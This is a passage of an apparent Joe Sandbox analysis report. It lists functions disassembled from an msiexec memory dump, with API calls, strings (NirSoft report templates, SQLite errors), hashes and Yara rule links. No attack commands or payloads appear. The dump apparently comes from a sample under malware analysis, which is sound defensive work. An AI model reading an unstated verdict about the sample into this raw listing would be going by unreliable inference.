                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                          Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                                          • API String ID: 4019544885-1856150674
                                                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$wcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                                                                                                                          • Opcode ID: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
